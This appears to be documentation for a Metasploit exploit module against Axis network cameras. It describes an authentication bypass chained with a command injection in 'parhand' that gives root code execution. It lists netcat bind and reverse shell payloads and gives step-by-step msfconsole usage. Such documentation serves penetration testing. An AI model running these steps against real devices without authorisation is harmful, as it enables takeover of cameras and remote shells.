This module exploits multiple vulnerabilities against Axis Network Cameras, including an authentication bypass in the .srv functionality, as well as a command injection in "parhand", in order to gain arbitrary remote code execution under the context of root.

The exploit currently only supports the following payloads:

* cmd/unix/bind_netcat_gaping
* cmd/unix/reverse_netcat_gaping

## Vulnerable Application

The particular firmware (Companion Dome V) tested for this exploit was 6.15.4, web version 16.05.02.

For a list of affected Axis products, please go to the following page:

https://www.axis.com/files/sales/ACV-128401_Affected_Product_List.pdf

## Verification Steps

1. Start msfconsole
2. Do: `use exploit/linux/http/axis_srv_parhand_rce`
3. Do: `set rhosts [IP]`
4. Do: `show payloads` to select a payload (that is not IPv6)
5. Do: `set payload [name of payload]`
6. Set LHOST if you are using a reverse shell
7. Do: `run`
8. You should get a session